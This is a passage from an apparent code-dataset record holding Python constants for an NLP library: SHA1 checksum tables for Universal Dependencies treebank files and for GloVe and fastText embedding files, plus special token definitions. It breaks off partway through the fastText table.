{'dev': (\n 'hu-ud-dev.conllu', 'ec622e6bcf2a84b0b47eba0de01cf5768157a50e'), 'test':\n ('hu-ud-test.conllu', 'fd717d25add38c2fb2dc8e82e2f9e5b0b9f3c5b8'),\n 'train': ('hu-ud-train.conllu',\n 'e5486523a8bebe40d633ad8b4050be8a3d11c78a')}, 'id': {'dev': (\n 'id-ud-dev.conllu', '7b181aa954a4f4b22b80a18e4f67cbf423e9c701'), 'test':\n ('id-ud-test.conllu', '357ed8c216725760bf5be561ed6e918ce602b5ac'),\n 'train': ('id-ud-train.conllu',\n '328ea588b75de55ef48373c2bf9983bca277d724')}, 'ga': {'dev': (\n 'ga-ud-dev.conllu', '180a1a9dcfcec6528a559032c67e9a15693a039d'), 'test':\n ('ga-ud-test.conllu', 'b74a56372af3f68f089ea82ba858e5a82aae4e22'),\n 'train': ('ga-ud-train.conllu',\n '40df0b12fbadae6e56c0a01da483d6c612d9450c')}, 'it_pud': {'test': (\n 'it_pud-ud-test.conllu', 'c7121c03dbdc7d27f89c6f6dd8f046b89233438e')},\n 'it_partut': {'dev': ('it_partut-ud-dev.conllu',\n '0bb5dc0c0815212c9832eaef3b802cf885e0543b'), 'test': (\n 'it_partut-ud-test.conllu', 'b5eccd3d9a94a2f96c8c3a6e4192a287ac563898'),\n 'train': ('it_partut-ud-train.conllu',\n '784b18bf8d3b59d967d147075a3cb5b03fb28637')}, 'it_postwita': {'dev': (\n 'it_postwita-ud-dev.conllu', '07f6f658246aa070e2166e688f7569d61aafff54'\n ), 'test': ('it_postwita-ud-test.conllu',\n 'c2d58f50e51d37cb5f55bd0a3129138e95a72a8a'), 'train': (\n 'it_postwita-ud-train.conllu',\n '69684c47fba99230f6ef1a204b95c37d28eaa5a6')}, 'it': {'dev': (\n 'it-ud-dev.conllu', 'ea8fd59f36280fbd77b9a807959491636048a698'), 'test':\n ('it-ud-test.conllu', '34839fdeeef883f8034c723a18772947106cec6b'),\n 'train': ('it-ud-train.conllu',\n 'a0cae413f46a344366f86bc7ffe4f5d7ecbf6a14')}, 'ja_pud': {'test': (\n 'ja_pud-ud-test.conllu', '4c914016a0968ca434348370d38c9579a60e8fd7')},\n 'ja': {'dev': ('ja-ud-dev.conllu',\n '21f06fef7fbeccd05a298385bf40f8b4ffe95146'), 'test': (\n 'ja-ud-test.conllu', '240d3532698356a7c6f93c3215718ef2f66a672f'),\n 'train': ('ja-ud-train.conllu',\n '35eaf307d94c2006241fe08f745d7b1b17f049cf')}, 'kk': {'dev': (\n 'kk-ud-dev.conllu', '038033c822b407040a4ecb87c077506cd0d1a322'), 'test':\n ('kk-ud-test.conllu', '4124bcaa6e4fc132613d94a882abcff8ecad8ca0'),\n 'train': ('kk-ud-train.conllu',\n '48d664d273ad6731cb65228ce9b57ad3cf50f7f5')}, 'ko': {'dev': (\n 'ko-ud-dev.conllu', '60e7da7cca44c923873a062e80262726659f5528'), 'test':\n ('ko-ud-test.conllu', 'bc9a0fc4ddfed14b70bb58048bf8b8d50062cffd'),\n 'train': ('ko-ud-train.conllu',\n 'ee21328f9ea39668e802f0cb6a794358f5c256bf')}, 'kmr': {'sample': (\n 'kmr-ud-sample.conllu', 'd76d631400d17b63b9592ce3c0f4ecada012d6d0'),\n 'test': ('kmr-ud-test.conllu',\n '606a338db2d6adde6b4d7d8c9ee2bdf1f988d729')}, 'la_ittb': {'dev': (\n 'la_ittb-ud-dev.conllu', 'd9f17992bd0258a734aea9b6c53759039717c86a'),\n 'test': ('la_ittb-ud-test.conllu',\n 'f4d097d076083240c48594d4cb058840ff16be8e'), 'train': (\n 'la_ittb-ud-train.conllu', '627d5b30b20655efab194c75fc9219b0aa2cf4b6')},\n 'la_proiel': {'dev': ('la_proiel-ud-dev.conllu',\n '9a510ff1f29b507ce46d32c04eb8f02ec8bdb4fb'), 'test': (\n 'la_proiel-ud-test.conllu', '697dbeae38507856a4fafa8506dfc8db5e8e4054'),\n 'train': ('la_proiel-ud-train.conllu',\n '5e57e0a83ed8dcdfcc892c2558249cb6bc02b37a')}, 'la': {'dev': (\n 'la-ud-dev.conllu', '2748bb0479cb599e1a007d1d1634d5870b45549b'), 'test':\n ('la-ud-test.conllu', '19c62c64ce41a650e9b55a345c61e7c0d994816e'),\n 'train': ('la-ud-train.conllu',\n '183ce6f58b0305e5926161e29b9a6aacc424662c')}, 'lv': {'dev': (\n 'lv-ud-dev.conllu', '6bf3843d92aeb5b4a5e3b457708ad0aca176fbd2'), 'test':\n ('lv-ud-test.conllu', '9f7806a24656db0e859efe041a88926b220b8e28'),\n 'train': ('lv-ud-train.conllu',\n 'f1eeff608e8f27d92b683ae041591355198841eb')}, 'lt': {'dev': (\n 'lt-ud-dev.conllu', '0b8dc19005571fa7b66d8302b797d51a241f128b'), 'test':\n ('lt-ud-test.conllu', 'def54d6caf97610eb4ca8c0179d661c8eab98951'),\n 'train': ('lt-ud-train.conllu',\n '13fe42a3d21f17a5cad5aaf38692619c7713e177')}, 'mr': {'dev': (\n 'mr-ud-dev.conllu', 'abf7ac90a3696bb979e6ddc17cbc0fc761040b1b'), 'test':\n ('mr-ud-test.conllu', 'b70e2a135e69dc17474951bfd9c7cf3f203d4798'),\n 'train': ('mr-ud-train.conllu',\n '24a1370184054a7f5af647997dca783d6c571242')}, 'sme': {'sample': (\n 'sme-ud-sample.conllu', '8c456f06b363c4d273fc454a49505f783f00fe43'),\n 'test': ('sme-ud-test.conllu',\n '6c2084f60d7f2d1468a0cb4f4a4b9669274b122e'), 'train': (\n 'sme-ud-train.conllu', '203eab4183fd585efe3fea7e6df493a6746b0a9f')},\n 'no_bokmaal': {'dev': ('no_bokmaal-ud-dev.conllu',\n '3a1aa6646ee62c605a6e5a7b535434ce93d0581f'), 'test': (\n 'no_bokmaal-ud-test.conllu', '18336ef0e4877ae28eb7d6019afe05b5a53245d5'\n ), 'train': ('no_bokmaal-ud-train.conllu',\n 'c6a1d75956dfb9376e568bf241b3ee5ebf3be3a5')}, 'no_nynorsk': {'dev': (\n 'no_nynorsk-ud-dev.conllu', '5b95a070d11a61a23fc340ecbbbbb70f86884498'),\n 'test': ('no_nynorsk-ud-test.conllu',\n '3eaab8e4af82de2333521e9be0954ffaf6b1440b'), 'train': (\n 'no_nynorsk-ud-train.conllu',\n '79319993097c30ddf28d4c1137b8662f4f35d17e')}, 'no_nynorsklia': {'dev':\n ('no_nynorsklia-ud-dev.conllu',\n 'f3e3cc9b156784c12e7540b6e09a19963df8d7d9'), 'test': (\n 'no_nynorsklia-ud-test.conllu',\n 'c43abf4ad0d9c1d844edb9ff0fdf8b00949c4a0b')}, 'cu': {'dev': (\n 'cu-ud-dev.conllu', '0b67035ed5ca52aeefae443611232ed202fb990a'), 'test':\n ('cu-ud-test.conllu', '0fed872a5a2480b601c67ebbecf8dcd680b6863b'),\n 'train': ('cu-ud-train.conllu',\n '1c58f7322b96aa65e2b6bbeb5cb5226b46dc3ef0')}, 'fa': {'dev': (\n 'fa-ud-dev.conllu', '098f97ff4c0a6a9dcaafe2c83908b1ff044b4446'), 'test':\n ('fa-ud-test.conllu', '0024aa6bad5eceed2e36f77d88578304a5886a80'),\n 'train': ('fa-ud-train.conllu',\n '1692f90f58fb1ed2faaa4e8c5d2d47a37c47082b')}, 'pl': {'dev': (\n 'pl-ud-dev.conllu', 'b7af7bee091feb0788eb9793a7102972006421dc'), 'test':\n ('pl-ud-test.conllu', 'e141e793ba35f8a08510ec1ce494099b5c800ca8'),\n 'train': ('pl-ud-train.conllu',\n 'f2227ba184a5030fc47b1aff732e04ae11b9ab94')}, 'pt_br': {'dev': (\n 'pt_br-ud-dev.conllu', '8eedc77096a87fe8ab251100d460780e161e5397'),\n 'test': ('pt_br-ud-test.conllu',\n '37a64e3acef107b62ab62ce478fc36ed112fb58f'), 'train': (\n 'pt_br-ud-train.conllu', '023cafcb6959d52298ad619f7838f26db9798aa9')},\n 'pt_pud': {'test': ('pt_pud-ud-test.conllu',\n '4f7a98b59255ff58a1a423dda6f2cb7261dcea7d')}, 'pt': {'dev': (\n 'pt-ud-dev.conllu', '2171b4ac2b0726c9dfae6adf394b76be927accab'), 'test':\n ('pt-ud-test.conllu', '9e819a4592db42905806141d6fca3b7b20396ce3'),\n 'train': ('pt-ud-train.conllu',\n 'b5fbb6598d5cc53a0f7e699adeb4a61948a49b5c')}, 'ro_nonstandard': {'test':\n ('ro_nonstandard-ud-test.conllu',\n '300d53091412dc5700dc5cad0fd3e136f7c8cb11'), 'train': (\n 'ro_nonstandard-ud-train.conllu',\n 'ed97f51129b63857627f838f68f41c9ef8541686')}, 'ro': {'dev': (\n 'ro-ud-dev.conllu', 'a320e29582e837fa48bbe0aab8e205cadfcb4a02'), 'test':\n ('ro-ud-test.conllu', '0cfe4806a28ebdc02dc7ea58635d8b550c3a9d7b'),\n 'train': ('ro-ud-train.conllu',\n '74beb2aa92d2fca50dbb1a4f716b936afb436ab9')}, 'ru_pud': {'test': (\n 'ru_pud-ud-test.conllu', 'bca81ce7aaf3cb8add98b19faecc1d8303901631')},\n 'ru_syntagrus': {'dev': ('ru_syntagrus-ud-dev.conllu',\n '304c6ec7fb5060583af5f890384e3a480f8c3ad5'), 'test': (\n 'ru_syntagrus-ud-test.conllu',\n 'c138e39b48dc1c66d106e68ee75c6fce28ef780c'), 'train': (\n 'ru_syntagrus-ud-train.conllu',\n '8fa56fa80845e4ad946189d1e7af228b5595e312')}, 'ru': {'dev': (\n 'ru-ud-dev.conllu', 'd3b11c0fd8a87bfb7ce9666a1888126ae5ddca90'), 'test':\n ('ru-ud-test.conllu', 'ae13bbf49e0d2fddae8ba2eeacd15a9a77c7bfff'),\n 'train': ('ru-ud-train.conllu',\n 'fd43e7323ad2e62a6924fc5b5d48e85c6ab5a430')}, 'sa': {'test': (\n 'sa-ud-test.conllu', 'fad3a03a6834884a092b1d326625c6f663e36636')}, 'sr':\n {'dev': ('sr-ud-dev.conllu', 'dcb9a242986285e83512ddaa4b3ada07c4cea17a'\n ), 'test': ('sr-ud-test.conllu',\n '0f0c9e394c440bb2dd514bdd6873d3ffef13821b'), 'train': (\n 'sr-ud-train.conllu', '97ea9bfe4ac97011598fbb5ca20b5cbaf5093334')},\n 'sk': {'dev': ('sk-ud-dev.conllu',\n 'c84563c08922d60b0c765e9f9c22d9f6f2765ff9'), 'test': (\n 'sk-ud-test.conllu', '89af4581c5f9058809f48788eb635a92cda0603c'),\n 'train': ('sk-ud-train.conllu',\n '89e108093bbf5619578955fdadfe200cefd8cf01')}, 'sl_sst': {'dev': (\n 'sl_sst-ud-dev.conllu', 'c65ae82123af95ec11f47262546b5ab2fc5735e5'),\n 'test': ('sl_sst-ud-test.conllu',\n '144a0124c1181b49d0c542a4a6d4465e45545f3b'), 'train': (\n 'sl_sst-ud-train.conllu', '4cbb97d5c19cfb1d85cdd54a13e24de2343a4ac5')},\n 'sl': {'dev': ('sl-ud-dev.conllu',\n '0078572c19574d32defeae9924176da2dd701ede'), 'test': (\n 'sl-ud-test.conllu', '616ace00e25df99be8dd49b7bf7c48f1093df96a'),\n 'train': ('sl-ud-train.conllu',\n '1462ac69163b30cf1399527e95f686ebf91be2d3')}, 'es_ancora': {'dev': (\n 'es_ancora-ud-dev.conllu', '94b00cc6449a1793b5ba1d9d5c1e4b34ad1cc7d5'),\n 'test': ('es_ancora-ud-test.conllu',\n '8d7dc8d8441e1ca4b54708a5382ed61b48bf7920'), 'train': (\n 'es_ancora-ud-train.conllu', '95d5bf7ad33304f3440ffb014ac094c4967c303f'\n )}, 'es_pud': {'test': ('es_pud-ud-test.conllu',\n 'c2b17fce1da3bdd2a50d9dd7eca101db1d2907e0')}, 'es': {'dev': (\n 'es-ud-dev.conllu', '4cdb828c492c6b7707af0ab6c7fbf734f770630a'), 'test':\n ('es-ud-test.conllu', 'afd1ae1b7eb73a91456c30acf388eef4faf4785a'),\n 'train': ('es-ud-train.conllu',\n '5ce48b44ba1b3e748a40cb5bf893d3096518ecbc')}, 'sv_lines': {'dev': (\n 'sv_lines-ud-dev.conllu', '15f1a04d960518fe7bfee23ce227fc7b78d4b755'),\n 'test': ('sv_lines-ud-test.conllu',\n '843df4ea3ab4f551b1eaa661652a8d6489a81d41'), 'train': (\n 'sv_lines-ud-train.conllu', '16e3533bf174b36d728847a36a3600f16c63baa6')\n }, 'sv_pud': {'test': ('sv_pud-ud-test.conllu',\n '18dadac0c15468256b340835ebc0529facbe9b73')}, 'sv': {'dev': (\n 'sv-ud-dev.conllu', '6d14e1aae5c9ae37c35481c44c04bf74a4233455'), 'test':\n ('sv-ud-test.conllu', '7ead0f7b49508db0022c042195ac5925b611c5b7'),\n 'train': ('sv-ud-train.conllu',\n '68affb85efde6ed017eab1e998e9666108559e04')}, 'swl': {'dev': (\n 'swl-ud-dev.conllu', '828e0a08f12cabfa75f9dd2b53dba58606522a7c'),\n 'test': ('swl-ud-test.conllu',\n '674f76631cf16172d67b795ff92dfbb297eb4930'), 'train': (\n 'swl-ud-train.conllu', '46b721f9cae2d5ba43f818dd487600b0ce76362a')},\n 'ta': {'dev': ('ta-ud-dev.conllu',\n '4d01f555012ddc1976933d4d928e26470f71bfa1'), 'test': (\n 'ta-ud-test.conllu', 'e8db8816a98d8b7e81188786db7c405979a7e3c3'),\n 'train': ('ta-ud-train.conllu',\n '6753d8c7b1b016de39c087aab45056de6021c3ae')}, 'te': {'dev': (\n 'te-ud-dev.conllu', '29f46355d767e54e8565f76a063c43e95ead0fca'), 'test':\n ('te-ud-test.conllu', '50abe345d4ab5bae021cacd096266c57b00572b8'),\n 'train': ('te-ud-train.conllu',\n '1794469abe09e7364cda0d9764cf515dcb4a61b6')}, 'tr_pud': {'test': (\n 'tr_pud-ud-test.conllu', 'aae839e2476a2f149c98e0274d245d07a50dafaa')},\n 'tr': {'dev': ('tr-ud-dev.conllu',\n '421de4d8d0fbdda46750523bde72880414c134a3'), 'test': (\n 'tr-ud-test.conllu', 'b175f136f6f0271c494a58a1846971c4a07cda27'),\n 'train': ('tr-ud-train.conllu',\n '5aeaf25fc9e00c75e377983a0d0a642e4df6ae7d')}, 'uk': {'dev': (\n 'uk-ud-dev.conllu', '0d3e3507edcd46a3eaa8c4702d0f5d84661a6d9d'), 'test':\n ('uk-ud-test.conllu', '46c88fd623894fabdafb01a826016c215e4f65cc'),\n 'train': ('uk-ud-train.conllu',\n 'd06e0e2fa67c35a20517738bd728ac3b26d8eafe')}, 'hsb': {'sample': (\n 'hsb-ud-sample.conllu', '148eddbb19b06115ea54e17a3fca58e99a85cbd9'),\n 'test': ('hsb-ud-test.conllu',\n '3d319288b4c06395b2627980737131995949f770')}, 'ur': {'dev': (\n 'ur-ud-dev.conllu', 'dc41e72b5adeb92f308cdc8dfcbf71f84b4a5cf9'), 'test':\n ('ur-ud-test.conllu', 'af5da25be4c4ec1f2a222bc462b39ca4bbcc0eb0'),\n 'train': ('ur-ud-train.conllu',\n '488d65b394d0de264be1221614c09e541f92f9de')}, 'ug': {'dev': (\n 'ug-ud-dev.conllu', 'a2e6cd7ef51ffd7c83de7c62fbad998f1020f857'), 'test':\n ('ug-ud-test.conllu', '4877323d8dbfaa8ab862f0aa8e5484fdadb9ef43')},\n 'vi': {'dev': ('vi-ud-dev.conllu',\n '1c733d3ea3e4cce00cb0aa4d599bcb3b0a6096a8'), 'test': (\n 'vi-ud-test.conllu', '1bb822e58f21aa5ccac15fe6c6742a42e8389d41'),\n 'train': ('vi-ud-train.conllu',\n 'ac86132afc061625740abd524c5cdf3d35ebbbc4')}}\n",
"step-3": "# coding: utf-8\n\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n# pylint: disable=too-many-lines\n\"\"\"Constants.\"\"\"\n\nUNK_TOKEN = '<unk>'\n\nBOS_TOKEN = '<bos>'\n\nEOS_TOKEN = '<eos>'\n\nPAD_TOKEN = '<pad>'\n\nUNK_IDX = 0 # This should not be changed as long as serialized token\n # embeddings redistributed on S3 contain an unknown token.\n # Blame this code change and see commit for more context.\n\nLARGE_POSITIVE_FLOAT = 1e18\n\nLARGE_NEGATIVE_FLOAT = -LARGE_POSITIVE_FLOAT\n\nGLOVE_NPZ_SHA1 = \\\n {'glove.42B.300d': ('glove.42B.300d.npz',\n '7deee8f4860744db53ed9e50892effe9883e6d89'),\n 'glove.6B.100d': ('glove.6B.100d.npz',\n '01f80f202fcabcc3e0804898349087bfc191dd1c'),\n 'glove.6B.200d': ('glove.6B.200d.npz',\n '5e6e2bdab346c257f88d80d215d518e680d86e32'),\n 'glove.6B.300d': ('glove.6B.300d.npz',\n '1db264aa936be62f055dfb72854204450bdf4399'),\n 'glove.6B.50d': ('glove.6B.50d.npz',\n 'aa16be8d184399d2199f83fd62586f2c30497bfa'),\n 'glove.840B.300d': ('glove.840B.300d.npz',\n 'b4ba390c1154736e07c0e67d9180935f5930e83c'),\n 'glove.twitter.27B.100d': ('glove.twitter.27B.100d.npz',\n '0f7b82c223451d0002f79ba23596983cdbe0e2b1'),\n 'glove.twitter.27B.200d': ('glove.twitter.27B.200d.npz',\n '41cc2d26f58a54622ce96bf6c8434360ab524f20'),\n 'glove.twitter.27B.25d': ('glove.twitter.27B.25d.npz',\n '9f563d2f296995598cc46812b2fda05ad4c3c879'),\n 'glove.twitter.27B.50d': ('glove.twitter.27B.50d.npz',\n 'ce9959c056f2a0a780c468feeb4f823af51630e9')}\n\nFAST_TEXT_NPZ_SHA1 = \\\n {'crawl-300d-2M': ('crawl-300d-2M.npz',\n '9dd611a1fe280c63050cd546d3595400fc0eede4'),\n 'wiki.aa': ('wiki.aa.npz',\n '48f163b80eb37f1806142169d3d4c05cf75b7339'),\n 'wiki.ab': ('wiki.ab.npz',\n '860ceff119dd27e5b701b605879037c1310cbc3e'),\n 'wiki.ace': ('wiki.ace.npz',\n '62938287464040491719f56a6f521f8f808beee8'),\n 'wiki.ady': ('wiki.ady.npz',\n '646843afa260d018ed711df3f1ca9c3e000447b6'),\n 'wiki.af': ('wiki.af.npz',\n '7b14cd27690b67fea318d0bac2283c16430680e2'),\n 'wiki.ak': ('wiki.ak.npz',\n '20f309adad1c45958c97b6055d5838e05bbaea72'),\n 'wiki.als': ('wiki.als.npz',\n 'a8b03aa133c4f7da12fc27c2b167b7918b1e9805'),\n 'wiki.am': ('wiki.am.npz',\n 'ed3dd10cea64737f7a1623612ee099df9dc19f66'),\n 'wiki.ang': ('wiki.ang.npz',\n '8efe64706d9d6b8eae38b2c7ff0b277e20592bc7'),\n 'wiki.an': ('wiki.an.npz',\n '168046283c719ab96a29b1abae2e25a6575c7be8'),\n 'wiki.arc': ('wiki.arc.npz',\n '049021b7decea4bc009b12936e56b4dbf5b760e7'),\n 'wiki.ar': ('wiki.ar.npz',\n '7e325e1e98dfcdc9368d2ebe40ee834a2ed44912'),\n 'wiki.arz': ('wiki.arz.npz',\n '7d851c2c7be3ee6f7fd896de7b76ea08e3fb08b0'),\n 'wiki.as': ('wiki.as.npz',\n '01d38c29cd4bd99c1a8534abc058822da14a5b9c'),\n 'wiki.ast': ('wiki.ast.npz',\n '9c9846ba5084505a0adea89c95c66e04efbf5ce9'),\n 'wiki.av': ('wiki.av.npz',\n '7ef6a920c364638504e673cfde5f7675503fa81e'),\n 'wiki.ay': ('wiki.ay.npz',\n 'c1202e110930e3902397f5cb64a8359e013b469f'),\n 'wiki.azb': ('wiki.azb.npz',\n '10351b7ef14ec2cb610d290cb6a3f6987ef5d8b3'),\n 'wiki.az': ('wiki.az.npz',\n '74257c3bcd533a606afae509ea835dc036d61546'),\n 'wiki.ba': ('wiki.ba.npz',\n '4a2857ed694d66864df562b376c2fa12fcb03646'),\n 'wiki.bar': ('wiki.bar.npz',\n 'e65c6b7e9ff83798d1eea05d166148837d53e615'),\n 'wiki.bat_smg': ('wiki.bat_smg.npz',\n '6420584ae28ba6c9dd145fea8f096243d457c2d8'),\n 'wiki.bcl': ('wiki.bcl.npz',\n '33606c970ab336b678393e2bdb8af2116d11cf7b'),\n 'wiki.be': ('wiki.be.npz',\n '84487d341e333344cf71bc12c7a205d923762498'),\n 'wiki.bg': ('wiki.bg.npz',\n '56f2a175b1a1d1a9cf9f1cea277cd0b46ffd7f66'),\n 'wiki.bh': ('wiki.bh.npz',\n '07473989853a344a41aaa18f41030dc56d0d01c7'),\n 'wiki.bi': ('wiki.bi.npz',\n '08adfa3c9ef3016d30ef69ea539d217ff67eda09'),\n 'wiki.bjn': ('wiki.bjn.npz',\n '998a551283222931d3a26922308449950bfa3ec7'),\n 'wiki.bm': ('wiki.bm.npz',\n '454ff9fbd4790e4a076d9a2087a51da28aa1332f'),\n 'wiki.bn': ('wiki.bn.npz',\n '1f36f6f39c9a9b33bb8035c9a4dc7e04933604fd'),\n 'wiki.bo': ('wiki.bo.npz',\n 'b9fe87318428de0a7790de175b5fec80c5af482d'),\n 'wiki.bpy': ('wiki.bpy.npz',\n '5c7853173d27e2c018c24eca69de8d5f34511b0d'),\n 'wiki.br': ('wiki.br.npz',\n '7aa66a2034fbfaa1d39e637385d48610238797c9'),\n 'wiki.bs': ('wiki.bs.npz',\n 'a019a4677677c2e9e4d899326b2b6c15ad6c011a'),\n 'wiki.bug': ('wiki.bug.npz',\n '09ae3477941d7a99d1df494368d7efb0b2c18913'),\n 'wiki.bxr': ('wiki.bxr.npz',\n 'b832c691b8ddd95896c052d3d15e1f98d72068d5'),\n 'wiki.ca': ('wiki.ca.npz',\n '391e0d4daad08649251274fa1cc2a5f49c7728b1'),\n 'wiki.cbk_zam': ('wiki.cbk_zam.npz',\n '02e57a763bc9f9eadaba57953383dd12a0a78a37'),\n 'wiki.cdo': ('wiki.cdo.npz',\n 'd6e8f422327e8b2273f1f2662d793707ece6695d'),\n 'wiki.ceb': ('wiki.ceb.npz',\n '23bc0bb9aeaa57dff35092766941a866de142aae'),\n 'wiki.ce': ('wiki.ce.npz',\n '182b2a889256119a6d379d501c55c7621e5855db'),\n 'wiki.ch': ('wiki.ch.npz',\n '82dd77512fcb463481f43c9cef3507e2baa90d7b'),\n 'wiki.cho': ('wiki.cho.npz',\n 'b0b620fc2442d1a6e2440e71a424861c80175f0c'),\n 'wiki.chr': ('wiki.chr.npz',\n '3d62c6b95c5af46abd6234426ae760cca65d5bd0'),\n 'wiki.chy': ('wiki.chy.npz',\n '34a28a22da79aebc100e3714b825c95c8d5f54a3'),\n 'wiki.ckb': ('wiki.ckb.npz',\n 'ad19461e4be583d08b7693ff5b1e9d590ed41add'),\n 'wiki.co': ('wiki.co.npz',\n 'fa60d9f0e79f1c7e15f381aef983a0f4f31c05a8'),\n 'wiki.crh': ('wiki.crh.npz',\n '540270ba6edd9d7b2f7efca52b3b407524ac67d1'),\n 'wiki.cr': ('wiki.cr.npz',\n 'f06b77465a38ec960d7d5a7554b848c37e945c76'),\n 'wiki.csb': ('wiki.csb.npz',\n 'b8b28559cf2541341af98e2aa755856765bdeabf'),\n 'wiki.cs': ('wiki.cs.npz',\n '19881e931fe06abf341450f00c342d364313e232'),\n 'wiki.cu': ('wiki.cu.npz',\n '731e0d00abd53bc2a8eb6cf37f6ab883cff34e15'),\n 'wiki.cv': ('wiki.cv.npz',\n 'e60034fcffb7dfef7b236ddba1194c3aa20b7967'),\n 'wiki.cy': ('wiki.cy.npz',\n '5a0fb967b5556f007c0d5065f951a3d3b1c1005a'),\n 'wiki.da': ('wiki.da.npz',\n 'd06258014ba2c7450bc2d55edfdf1731433e42e5'),\n 'wiki.de': ('wiki.de.npz',\n 'a21694dfd2af63bd7bb00f0b60b28e88bd1153f1'),\n 'wiki.diq': ('wiki.diq.npz',\n '4f6c77a86b39834a7130419967759afd8cc26b84'),\n 'wiki.dsb': ('wiki.dsb.npz',\n 'e74f1d346a8db96987bff0c33ee5f886907c380a'),\n 'wiki.dv': ('wiki.dv.npz',\n '5d6fe6f0eec2e7704121d5aba03b4edbb28af873'),\n 'wiki.dz': ('wiki.dz.npz',\n '77c639d36d0355b2de5adead7996eae342b852a6'),\n 'wiki.ee': ('wiki.ee.npz',\n '4b5a76127d57515d3e8a76787cdefde5856b754a'),\n 'wiki.el': ('wiki.el.npz',\n 'a00bcb97e7898931196a1c69f7a492e5b6202661'),\n 'wiki.eml': ('wiki.eml.npz',\n 'b475d626b3d97e7a68c02827fdc7900599e838c6'),\n 'wiki.en': ('wiki.en.npz',\n 'ad5ec6d49db6c6fe76b8e85ff05d34e5d0e1eb6a'),\n 'wiki.eo': ('wiki.eo.npz',\n '18049b0010520d13e676f5a82e8bb90153d99003'),\n 'wiki.es': ('wiki.es.npz',\n 'a6d192ba7d82d762f8367e75ca951aad4d11e410'),\n 'wiki.et': ('wiki.et.npz',\n '4beb7025cf88f1aa62d025b187f0cb09aee61858'),\n 'wiki.eu': ('wiki.eu.npz',\n '5e1a8197e35f20a2476798bbb935b4c131289c4f'),\n 'wiki.ext': ('wiki.ext.npz',\n '049b2d1b0a8b102b45907cf487cac30aa294e0a0'),\n 'wiki.fa': ('wiki.fa.npz',\n '81ed274997c87ef87d73d25e166ca06272ce426f'),\n 'wiki.ff': ('wiki.ff.npz',\n '4867dc74cd53ca0b0f769af4fa1ea420406b59bf'),\n 'wiki.fi': ('wiki.fi.npz',\n '6d1291b854045179f8171ac7d62ede7d8ac159a2'),\n 'wiki.fiu_vro': ('wiki.fiu_vro.npz',\n 'dd87806d9dc8833fa0e21e35a50815ebdbaa6c8b'),\n 'wiki.fj': ('wiki.fj.npz',\n 'cf5c31b0a69276f5dd18ab738ed92444abaeb755'),\n 'wiki.fo': ('wiki.fo.npz',\n 'ffc19807d528af000861a94cfb8097bd686e14fc'),\n 'wiki.fr': ('wiki.fr.npz',\n '8f06d5dbe3cf7214354fe9b2f6eca0ef7419f063'),\n 'wiki.frp': ('wiki.frp.npz',\n 'c8b200ae592478d3cd0bfaafcd7aa19de8a3bfe5'),\n 'wiki.frr': ('wiki.frr.npz',\n 'fa5e5c39ea2a45793c679eacea290a35e37405ea'),\n 'wiki.fur': ('wiki.fur.npz',\n 'a61a8940d059f25000e3fe23933e5ed0d37e65d3'),\n 'wiki.fy': ('wiki.fy.npz',\n '46f9f41bdf6f4fb8e27a753290413d745465963b'),\n 'wiki.gag': ('wiki.gag.npz',\n '49fb01230e6803544122d47ab7d3fe694d1444f2'),\n 'wiki.gan': ('wiki.gan.npz',\n '716b7b26acc15975f30caf3c6effa111516fcca5'),\n 'wiki.ga': ('wiki.ga.npz',\n 'ea934bc1fdc1acf6caf9ac746c6c499251f1fdee'),\n 'wiki.gd': ('wiki.gd.npz',\n '597017b5a32d933f194595d3656f858e37e70a62'),\n 'wiki.glk': ('wiki.glk.npz',\n '91a5834658bc2d48714e8807ef24efb79567b4b5'),\n 'wiki.gl': ('wiki.gl.npz',\n '2fa8e48d6ae1e9c9d542eb3f2156cf9e359e66c2'),\n 'wiki.gn': ('wiki.gn.npz',\n 'e359eef3928e1f1b5d8fcf0ea532e8794c66289a'),\n 'wiki.gom': ('wiki.gom.npz',\n '8cd361481c23f7545cc2bd8f1bf22aa7400edd4d'),\n 'wiki.got': ('wiki.got.npz',\n 'd05daf105611150695e61775fdff2c500b36be3f'),\n 'wiki.gu': ('wiki.gu.npz',\n '0ce175c5fc39bab4032892f70c9d2bb850af0f4a'),\n 'wiki.gv': ('wiki.gv.npz',\n '2c573f873d607831ff01b64603c17b8db79bd7e1'),\n 'wiki.hak': ('wiki.hak.npz',\n 'e6048727799cdf149f5c50037e0fc59300d33a94'),\n 'wiki.ha': ('wiki.ha.npz',\n 'f18ea7286bbd390c5470896b2c99cb1adc740064'),\n 'wiki.haw': ('wiki.haw.npz',\n '18bcd85d2e06b1b889f0835fc5b62697fdf32d72'),\n 'wiki.he': ('wiki.he.npz',\n '76915ff167b6ecb7b7e22ff0ca46914a55d344af'),\n 'wiki.hif': ('wiki.hif.npz',\n '12153aaf98d76d5502ab77a27cd0b9a539f61513'),\n 'wiki.hi': ('wiki.hi.npz',\n '249666a598991f6ec147954c6af9e531fd1cd94e'),\n 'wiki.ho': ('wiki.ho.npz',\n '3f804fd69780c0789708b56ea9d48715f8e38f26'),\n 'wiki.hr': ('wiki.hr.npz',\n '9a3de28e69f97048bfb480b4f83eaab6149f66ad'),\n 'wiki.hsb': ('wiki.hsb.npz',\n '7070bf64e13299dd66ac0e9f8e24011a56b6bfe8'),\n 'wiki.ht': ('wiki.ht.npz',\n 'a607093d511afeb584d02dc676bc5a27eff66287'),\n 'wiki.hu': ('wiki.hu.npz',\n '9b2c4750daf1bcf39768572e874b5afda0e2f0bc'),\n 'wiki.hy': ('wiki.hy.npz',\n 'ec0461a102a6fb00bd324f66cefd3c8d55a7093a'),\n 'wiki.hz': ('wiki.hz.npz',\n '5dfb8afbdae6b4148c3e55ab459c56a74b46b463'),\n 'wiki.ia': ('wiki.ia.npz',\n '4cfaaf053b9513bbf5b2423258c0f01d20256de6'),\n 'wiki.id': ('wiki.id.npz',\n 'bace396bb9941cc9e5b2e5f5a19be6db833c5fd4'),\n 'wiki.ie': ('wiki.ie.npz',\n '1bae7256c2e763ce6d692d1c0a603d99a8b22826'),\n 'wiki.ig': ('wiki.ig.npz',\n '23128e54a5e143891d392d621723bad9cfc8cf7b'),\n 'wiki.ii': 